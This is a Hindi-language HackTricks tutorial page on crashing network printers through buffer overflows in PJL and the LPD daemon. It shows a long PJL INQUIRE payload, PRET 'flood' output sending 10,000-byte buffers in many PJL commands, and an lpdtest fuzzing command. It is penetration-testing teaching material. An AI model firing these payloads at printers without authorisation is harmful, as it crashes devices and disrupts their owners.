7.7 KiB
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
क्या आप किसी साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करने की आवश्यकता है? सदस्यता योजनाएं की जांच करें!
-
खोजें The PEASS Family, हमारा विशेष संग्रह NFTs
-
प्राप्त करें आधिकारिक PEASS & HackTricks swag
-
शामिल हों 💬 Discord समूह या टेलीग्राम समूह या फॉलो करें मुझे Twitter 🐦@carlospolopm.
-
अपने हैकिंग ट्रिक्स को hacktricks रेपो और hacktricks-cloud रेपो में पीआर जमा करके साझा करें।
PJL
विभिन्न Lexmark लेजर प्रिंटर्स क्रैश हो जाते हैं जब उन्हें INQUIRE तर्क के रूप में लगभग 1,000 वर्ण प्राप्त होते हैं (देखें CVE-2010-0619) और Dell 1720n को लगभग 3,000 वर्णों के रूप में SET तर्क भेजने पर उपकरण क्रैश हो जाता है:
@PJL INQUIRE 00000000000000000000000000000000000000000000000000000…
आप PRET का उपयोग करके बफर ओवरफ्लो की जांच कर सकते हैं:
./pret.py -q printer pjl
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> flood
Buffer size: 10000, Sending: @PJL SET [buffer]
Buffer size: 10000, Sending: @PJL [buffer]
Buffer size: 10000, Sending: @PJL COMMENT [buffer]
Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer]
Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]"
Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]"
Buffer size: 10000, Sending: @PJL INFO [buffer]
Buffer size: 10000, Sending: @PJL ECHO [buffer]
Buffer size: 10000, Sending: @PJL INQUIRE [buffer]
Buffer size: 10000, Sending: @PJL DINQUIRE [buffer]
Buffer size: 10000, Sending: @PJL USTATUS [buffer]
Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]"
Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]"
Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]"
LPD डीमन
यह एक से अधिक उपयोगकर्ता-निर्धारित वेक्टरों को समर्थित करता है जैसे जॉबनेम, उपयोगकर्ता नाम या होस्टनेम, जो पर्याप्त रूप से सुरक्षित नहीं हो सकते हैं। इस खराबी से संबंधित कई संकट पहले से ही खोजे जा चुके हैं।
बफर ओवरफ्लो के लिए टेस्ट करने के लिए एक सरल LPD फज़र lpdtest
उपकरण का उपयोग करके बनाया जा सकता है जो PRET में शामिल है। in
तर्क ने LPD प्रोटोकॉल द्वारा परिभाषित सभी उपयोगकर्ता इनपुट को एक निश्चित मान (इस मामले में, Python आउटपुट) पर सेट किया है:
./lpdtest.py printer in "`python -c 'print "x"*150'`"
इन हमलों के बारे में अधिक जानकारी आप http://hacking-printers.net/wiki/index.php/Buffer_overflows में पा सकते हैं।
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित करना चाहते हैं? या क्या आपको PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करने की आवश्यकता है? SUBSCRIPTION PLANS की जांच करें!
-
खोजें The PEASS Family, हमारा विशेष संग्रह NFTs
-
प्राप्त करें आधिकारिक PEASS & HackTricks swag
-
शामिल हों 💬 Discord समूह या टेलीग्राम समूह में या मुझे Twitter 🐦@carlospolopm** का** अनुसरण करें।**
-
अपने हैकिंग ट्रिक्स को hacktricks रेपो और hacktricks-cloud रेपो में पीआर जमा करके साझा करें।